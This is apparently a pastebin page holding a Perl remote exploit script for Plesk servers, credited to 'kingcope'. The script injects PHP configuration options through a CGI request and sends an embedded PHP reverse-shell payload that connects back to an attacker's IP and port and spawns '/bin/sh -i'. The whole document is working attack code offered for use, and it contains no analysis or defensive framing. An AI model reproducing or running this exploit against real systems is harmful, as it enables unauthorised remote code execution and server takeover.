SHOW:
|
|
- or go back to the newest paste.
1 | #plesk remote exploit by kingcope | |
2 | #vaguely prettified by some guy | |
3 | #all your base belongs to me :> | |
4 | ||
5 | use strict; | |
6 | use warnings; | |
7 | use IO::Socket; | |
8 | use IO::Socket::SSL; | |
9 | use URI::Escape; | |
10 | ||
11 | sub usage { | |
12 | print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit; | |
13 | } | |
14 | ||
15 | my ($target,$proto,$lip,$lport) = @ARGV; | |
16 | my $sock; | |
17 | if ($proto eq "http") { | |
18 | $sock = IO::Socket::INET->new( | |
19 | PeerAddr => $target, | |
20 | PeerPort => 80, | |
21 | Proto => 'tcp'); | |
22 | } | |
23 | elsif ($proto eq "https") { | |
24 | $sock = IO::Socket::SSL->new( | |
25 | PeerAddr => $target, | |
26 | PeerPort => 443, | |
27 | Proto => 'tcp'); | |
28 | } | |
29 | else { | |
30 | &usage(); | |
31 | } | |
32 | ||
33 | sub main { | |
34 | my $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip = | |
35 | '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; | |
36 | \$error_a = null; \$shell = '/bin/sh -i'; \$daemon = | |
37 | 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = | |
38 | pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); | |
39 | exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { | |
40 | printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { | |
41 | printit(\"WARNING: Failed to daemonise. This is quite common and not | |
42 | fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, | |
43 | \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); | |
44 | exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => | |
45 | array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = | |
46 | proc_open(\$shell, \$descriptorspec, \$pipes);if | |
47 | (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); | |
48 | exit(1);}stream_set_blocking(\$pipes[0], | |
49 | 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], | |
50 | 0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) { | |
51 | printit(\"done.\"); break;} if | |
52 | (feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1], | |
53 | \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, | |
54 | \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) | |
55 | printit(\"SOCK READ\");\$input = fread(\$sock, | |
56 | \$chunk_size);if(\$debug) printit(\"SOCK: | |
57 | \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], | |
58 | \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = | |
59 | fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: | |
60 | \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], | |
61 | \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = | |
62 | fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: | |
63 | \$input\");fwrite(\$sock, | |
64 | \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print | |
65 | \"\$string\n\";}} | |
66 | ?>"; | |
67 | my $arguments = uri_escape("-d","\0-\377"). "+" . | |
68 | uri_escape("allow_url_include=on","\0-\377"). "+" . | |
69 | uri_escape("-d","\0-\377"). "+" . | |
70 | uri_escape("safe_mode=off","\0-\377"). "+" . | |
71 | uri_escape("-d","\0-\377"). "+" . | |
72 | uri_escape("suhosin.simulation=on","\0-\377"). "+" . | |
73 | uri_escape("-d","\0-\377"). "+" . | |
74 | uri_escape("disable_functions=\"\"","\0-\377"). "+" . | |
75 | uri_escape("-d","\0-\377"). "+" . | |
76 | uri_escape("open_basedir=none","\0-\377"). "+" . | |
77 | uri_escape("-d","\0-\377"). "+" . | |
78 | uri_escape("auto_prepend_file=php://input","\0-\377"). "+" . | |
79 | uri_escape("-n","\0-\377"); | |
80 | my $path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377"); | |
81 | print $sock "POST /$path?$arguments HTTP/1.1\r\n". | |
82 | "Host: $ARGV[0]\r\n". | |
83 | "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n". | |
84 | "Content-Type: text/plain\r\n". | |
85 | "Content-Length: ". length($pwn) ."\r\n\r\n". $pwn; | |
86 | while(<$sock>){ | |
87 | print $_; | |
88 | }; | |
89 | } | |
90 | ||
91 | #arguably here is the actual main but yeah | |
92 | if (@ARGV != 3){ | |
93 | &usage(); | |
94 | } | |
95 | else { | |
96 | &main(); | |
97 | exit(); | |
98 | } |